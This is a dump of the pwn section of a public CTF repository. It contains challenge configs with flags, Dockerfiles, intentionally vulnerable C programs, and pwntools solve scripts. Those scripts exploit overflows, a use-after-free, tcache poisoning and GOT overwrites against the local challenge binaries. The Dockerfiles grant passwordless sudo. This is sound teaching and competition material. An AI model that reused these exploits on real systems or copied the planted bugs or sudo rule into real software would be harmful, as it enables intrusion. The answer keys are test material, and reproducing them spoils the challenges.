Simulator/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/dist/program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/dist/program -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | feedbackservice: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{canary_master_101} 2 | -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/src/program -------------------------------------------------------------------------------- /Challenges/Pwn/README.md: -------------------------------------------------------------------------------- 1 | Pwn Challenges -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabyCPP 2 | author: fern 3 | category: pwn 4 | description: My teacher said Object Oriented Programming is good... so I made this epic program! Try to get my flag! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{b4By_C_P_p_p_P_1uwk8198} 13 | 14 | files: 15 | - dist/chal.cpp 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babycpp/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babycpp/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000) #process() 4 | win = elf.sym["_Z3winv"] 5 | p.sendlineafter(b": ", b"5") 6 | p.recvuntil(b"address for you: ") 7 | addr = int(p.recvline().strip(), 16) + 5 + 80 - 16 - 1 8 | payload = flat( 9 | 0, 10 | win, 11 | addr, 12 | addr + 8 13 | ).rjust(80 - 1, b"A") 14 | p.clean(timeout = 0.2) 15 | p.sendline(payload) 16 | print(p.readline().decode()) -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | RUN chmod 555 /srv/app/run 6 | RUN chmod 555 /srv/app/entry.sh 7 | RUN dpkg --add-architecture i386 8 | RUN apt-get update && apt-get install -y socat libc6:i386 libstdc++6:i386 9 | 10 | RUN addgroup --gid 1001 nonroot && \ 11 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 12 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 13 | USER 1001 14 | 15 | WORKDIR /srv/app 16 | 17 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babycpp/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babycpp: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo READY 3 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabyOverflow 2 | author: fern 3 | category: pwn 4 | description: I built this note taking app, can you hack it? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{4ctuAlLy_UnD3rFl0w} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babyoverflow/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solvescript in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babyoverflow/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000)#process() 4 | p.clean() 5 | p.sendline(b"\x08"*4 + p32(0x1337beef)) 6 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | RUN chmod 555 /srv/app/run 6 | RUN chmod 555 /srv/app/entry.sh 7 | RUN apt-get update && apt-get install -y socat 8 | 9 | RUN addgroup --gid 1001 nonroot && \ 10 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 11 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 12 | USER 1001 13 | 14 | WORKDIR /srv/app 15 | 16 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babyoverflow/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babyoverflow: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Enotes 2 2 | author: fern 3 | category: pwn 4 | description: Introducing enotes 2, the private edition of enotes! Spin up your own server, and take notes with your friends! All connections are interactive too! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{l1F3_i5_A_R4c3_And_1_4m_Th3_r4c3R} 13 | 14 | files: 15 | - dist/enotes.c 16 | - dist/enotes 17 | - dist/ld-linux-x86-64.so.2 18 | - dist/libc.so.6 19 | 20 | connection_info: nc hostname 8000 21 | 22 | state: visible 23 | version: "0.1" 24 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/dist/enotes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/dist/enotes -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/soln/enotes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/soln/enotes -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/soln/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/soln/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solution in `soln/`. -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.11-slim-bookworm 3 | 4 | # switch working directory 5 | WORKDIR /app 6 | 7 | # copy every content from the local file to the image 8 | COPY . /app 9 | 10 | RUN chmod 555 /app/enotes 11 | RUN chmod 555 /app/libc.so.6 12 | RUN chmod 555 /app/ld-linux-x86-64.so.2 13 | RUN chmod 444 /app/flag.txt 14 | 15 | RUN addgroup --gid 1001 nonroot && \ 16 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 17 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 18 | USER 1001 19 | 20 | RUN pip install psutil 21 | 22 | # configure the container to run in an executed manner 23 | ENTRYPOINT [ "python" ] 24 | 25 | CMD ["app.py" ] 26 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | enotes: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8400" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/enotes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/src/enotes -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congrats! Your flag is: blahaj{l1F3_i5_A_R4c3_And_1_4m_Th3_r4c3R} 2 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Notepad 2 | author: fern 3 | category: pwn 4 | description: Try to hack this notepad! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Us3_4FtEr_fRE3} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solvescript in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/solve/sol.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000) #process() 4 | cls = lambda: p.clean(timeout = 0.1) 5 | def send(x): 6 | p.sendline(x) 7 | cls() 8 | send(b"2") 9 | send(b"a") 10 | send(b"a") 11 | send(b"4") 12 | send(b"1") 13 | send(b"A" * 32 + p64(elf.sym["win"])) 14 | p.sendline(b"3") 15 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | COPY ./flag.txt /srv/app/flag.txt 6 | RUN chmod 555 /srv/app/run 7 | RUN chmod 444 /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/entry.sh 9 | RUN apt-get update && apt-get install -y socat 10 | 11 | RUN addgroup --gid 1001 nonroot && \ 12 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 13 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 14 | USER 1001 15 | 16 | WORKDIR /srv/app 17 | 18 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | notepad: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{Us3_4FtEr_fRE3} -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Notepad 2 2 | author: fern 3 | category: pwn 4 | description: First notepad too easy eh? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Tc4ch3_PoIs0nIng} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | - dist/ld-linux-x86-64.so.2 18 | - dist/libc.so.6 19 | 20 | connection_info: nc hostname 8000 21 | 22 | state: visible 23 | version: "0.1" 24 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | #context.log_level = "DEBUG" 3 | context.binary = elf = ELF("chal") 4 | p = remote("localhost", 8000) #process() 5 | cls = lambda: p.clean(timeout = 0.1) 6 | def sl(x): 7 | p.sendline(x.encode()) 8 | cls() 9 | 10 | sl("1 0") 11 | sl("TEST") 12 | sl("1 1") 13 | sl("TEST") 14 | sl("2 0") 15 | sl("2 1") 16 | sl("3 1") 17 | p.sendline(p64(elf.got["__isoc99_scanf"])) 18 | cls() 19 | sl("1 0") 20 | sl("TEST") 21 | sl("1 1") 22 | p.sendline(p64(elf.sym["win"])) 23 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./libc.so.6 /srv/app/libc.so.6 5 | COPY ./ld-linux-x86-64.so.2 /srv/app/ld-linux-x86-64.so.2 6 | COPY ./entry.sh /srv/app/entry.sh 7 | COPY ./flag.txt /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/run 9 | RUN chmod 555 /srv/app/libc.so.6 10 | RUN chmod 555 /srv/app/ld-linux-x86-64.so.2 11 | RUN chmod 444 /srv/app/flag.txt 12 | RUN chmod 555 /srv/app/entry.sh 13 | RUN apt-get update && apt-get install -y socat 14 | 15 | RUN addgroup --gid 1001 nonroot && \ 16 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 17 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 18 | USER 1001 19 | 20 | WORKDIR /srv/app 21 | 22 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | notepad2: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congrats! Your flag is blahaj{Tc4ch3_PoIs0nIng} -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Onewrite 2 | author: fern 3 | category: pwn 4 | description: Surely a single overflow can't be that bad... right? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{3X1t_h4nDleRs_0vErr4T3d} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | - dist/ld-linux-x86-64.so.2 18 | - dist/libc.so.6 19 | 20 | connection_info: nc hostname 8000 21 | 22 | state: visible 23 | version: "0.1" 24 | -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/chal.c: -------------------------------------------------------------------------------- 1 | // gcc chal.c -O0 -Wl,-z,relro,-z,now -s -o chal 2 | #include 3 | #include 4 | int main(){ 5 | setvbuf(stdout, NULL, _IONBF, 0); 6 | setvbuf(stdin, NULL, _IONBF, 0); 7 | setvbuf(stderr, NULL, _IONBF, 0); 8 | printf("Surely a single overflow can't be that bad... right?\nPlease enter size of your malloc: "); 9 | unsigned int malsz = 0; 10 | scanf("%d", &malsz); 11 | unsigned char *alloc = malloc(malsz); 12 | printf("Cool, you got an alloc to %p\nNow, please select your offset: ", alloc); 13 | unsigned int off = 0; 14 | scanf("%d", &off); 15 | printf("And pray tell, what would you wish to write to there?\n"); 16 | unsigned long long datum = 0; 17 | scanf("%lld", &datum); 18 | *((unsigned long long*)(alloc + off)) = datum; 19 | puts(NULL); //i find that a segfault is the safest way to exit... we don't want people screwing with exit handlers now do we? 20 | } -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/chal.c: -------------------------------------------------------------------------------- 1 | // gcc chal.c -O0 -Wl,-z,relro,-z,now -s 2 | #include 3 | #include 4 | int main(){ 5 | setvbuf(stdout, NULL, _IONBF, 0); 6 | setvbuf(stdin, NULL, _IONBF, 0); 7 | setvbuf(stderr, NULL, _IONBF, 0); 8 | printf("Surely a single overflow can't be that bad... right?\nPlease enter size of your malloc: "); 9 | unsigned int malsz = 0; 10 | scanf("%d", &malsz); 11 | unsigned char *alloc = malloc(malsz); 12 | printf("Cool, you got an alloc to %p\nNow, please select your offset: ", alloc); 13 | unsigned int off = 0; 14 | scanf("%d", &off); 15 | printf("And pray tell, what would you wish to write to there?\n"); 16 | unsigned long long datum = 0; 17 | scanf("%lld", &datum); 18 | *((unsigned long long*)(alloc + off)) = datum; 19 | puts(NULL); //i find that a segfault is the safest way to exit... we don't want people screwing with exit handlers now do we? 20 | } -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/solve/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/solve/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./libc.so.6 /srv/app/libc.so.6 5 | COPY ./ld-linux-x86-64.so.2 /srv/app/ld-linux-x86-64.so.2 6 | COPY ./entry.sh /srv/app/entry.sh 7 | COPY ./flag.txt /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/run 9 | RUN chmod 555 /srv/app/libc.so.6 10 | RUN chmod 555 /srv/app/ld-linux-x86-64.so.2 11 | RUN chmod 444 /srv/app/flag.txt 12 | RUN chmod 555 /srv/app/entry.sh 13 | RUN apt-get update && apt-get install -y socat 14 | 15 | RUN addgroup --gid 1001 nonroot && \ 16 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 17 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 18 | USER 1001 19 | 20 | WORKDIR /srv/app 21 | 22 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | onewrite: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congrats! Your flag is blahaj{3X1t_h4nDleRs_0vErr4T3d} -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/password/challenge.yml: -------------------------------------------------------------------------------- 1 | name: IsEven 2 | author: fern 3 | category: pwn 4 | description: I wrote this amazing new service to tell you if a number is even, try and hack it! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{g0T_Ov3rRide} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/password/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/password/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/password/dist/chal.c: -------------------------------------------------------------------------------- 1 | //gcc chal.c -m32 -no-pie -o chal 2 | 3 | #include 4 | #include 5 | 6 | void win(){ 7 | system("cat flag.txt"); 8 | } 9 | 10 | void isEven(){ 11 | int num; 12 | printf("Enter your number: "); 13 | scanf("%d", num); 14 | 15 | if(num % 2 == 0){ 16 | puts("The number is even!"); 17 | }else{ 18 | puts("The number is odd!"); 19 | } 20 | } 21 | void getFeedback(){ 22 | char feedback[100]; 23 | printf("We know our service is amazing, so you can give feedback before using it!\nFeedback: "); 24 | scanf("%100s", feedback); 25 | } 26 | 27 | int main(){ 28 | setvbuf(stdin, NULL, _IONBF, 0); 29 | setvbuf(stdout, NULL, _IONBF, 0); 30 | printf("IsEven Service\n"); 31 | getFeedback(); 32 | isEven(); 33 | return 0; 34 | } -------------------------------------------------------------------------------- /Challenges/Pwn/password/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/password/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/password/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/password/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000)# process() 4 | p.sendline(b"A"*96 + p32(elf.got["puts"])) 5 | p.sendline(str(elf.sym["win"]).encode()) 